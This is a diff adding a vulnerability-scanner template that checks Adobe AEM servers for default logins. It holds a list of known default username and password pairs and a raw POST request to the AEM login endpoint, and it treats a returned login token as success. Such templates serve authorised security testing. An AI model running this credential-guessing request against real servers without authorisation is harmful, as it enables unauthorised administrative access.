diff --git a/default-logins/aem/adobe-aem-default-credentials.yaml b/default-logins/aem/adobe-aem-default-credentials.yaml
new file mode 100644
index 0000000000..254903e532
--- /dev/null
+++ b/default-logins/aem/adobe-aem-default-credentials.yaml
@@ -0,0 +1,67 @@
+id: adobe-aem-default-credentials
+
+info:
+  name: Adobe AEM Default Credentials
+  author: random-robbie
+  severity: critical
+  tags: aem,default-login
+  reference:
+
+requests:
+
+  - payloads:
+
+      rr_username:
+        - admin
+        - grios
+        - replication-receiver
+        - vgnadmin
+        - aparker@geometrixx.info
+        - jdoe@geometrixx.info
+        - james.devore@spambob.com
+        - matt.monroe@mailinator.com
+        - aaron.mcdonald@mailinator.com
+        - jason.werner@dodgit.com
+
+      rr_password:
+        - admin
+        - password
+        - replication-receiver
+        - vgnadmin
+        - aparker
+        - jdoe
+        - password
+        - password
+        - password
+        - password
+
+    attack: pitchfork  # Available options: sniper, pitchfork and clusterbomb
+
+    raw:
+      - |
+        POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
+        Accept: text/plain, */*; q=0.01
+        Accept-Language: en-US,en;q=0.5
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+        Content-Length: 67
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}/libs/granite/core/content/login.html
+        Connection: close
+
+        _charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - login-token
+          - crx.default
+        condition: and